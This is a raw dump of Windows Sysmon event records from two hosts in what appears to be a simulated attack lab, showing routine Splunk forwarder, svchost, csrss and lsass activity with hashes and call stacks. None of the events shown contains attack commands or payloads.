11:02:01.467{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:01.467{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:01.467{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1429-6216-8D06-000000003802}4512C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:01.467{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1429-6216-8D06-000000003802}4512C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:01.468{C8EA50B7-1429-6216-8D06-000000003802}4512C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218641Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:02.734{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08BACF4C93035DAD1DD20A934D8B012E,SHA256=0D4C79E34D19A8FDB4325339131AB66A240180EF2D5D45F8C335BCCA9185497D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:02.904{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=329417D1BBC61D1AB94007D7C26A2EC7,SHA256=0FA5E189944AF08C7312229D5F0416F8E1FF764F0FFDF2BDB5A1DE77AEDE57ED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:02.525{C8EA50B7-142A-6216-8E06-000000003802}71047096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:02.100{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-142A-6216-8E06-000000003802}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:02.084{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-142A-6216-8E06-000000003802}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:02.084{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:02.084{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:02.084{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:02.084{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:02.084{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-142A-6216-8E06-000000003802}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:02.086{C8EA50B7-142A-6216-8E06-000000003802}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218642Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:03.765{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BF35374211FADF16A063721B8F7FCBE,SHA256=7A21A1201CE1043BCA86F4ACDBC27222925D9A2EC79E5FBBDD7FD181446F8626,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:03.957{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-142B-6216-8F06-000000003802}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:03.957{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:03.957{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:03.957{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:03.957{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:03.957{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-142B-6216-8F06-000000003802}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:03.957{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-142B-6216-8F06-000000003802}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:03.959{C8EA50B7-142B-6216-8F06-000000003802}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:03.926{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EDEC5D17137703E497D2F73A89A324A,SHA256=741BD163DFE27B82BB032197F321472AAE24A7EC643EEFCA175F3DEB7BA9AD67,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000294343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:03.789{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d828a4-0xca1a346f) 23542300x8000000000000000294342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:03.473{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=49E7B7CEA5D40BAC19E35FBDBFF2FDAE,SHA256=5F86AFE422CF920355827EEE959FB3592C9E90BD7461F5F390DA12FCFC130681,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:03.473{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=5BD23C4FA45518E219310161C638EB14,SHA256=6CBEFBCAA2B83A5819E5580330A079BE1F39079BC10413B7C7ACB5198D1E35F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218644Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:02.559{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51473-false10.0.1.12-8000- 23542300x8000000000000000218643Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:04.766{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0DA57DF49542F43DFAB7CF633584325,SHA256=82B2E15819265BD1FCBB2414714917ECCC693381E5788E4E073F91F194BF8101,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218645Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:05.781{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62EA75912E1B1BFC4E9710422B8F2616,SHA256=A58685CDF29A1740548E0E5B11865487C1082D0CBDF8324F887245AC4750F48F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:03.294{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53885-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000294354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 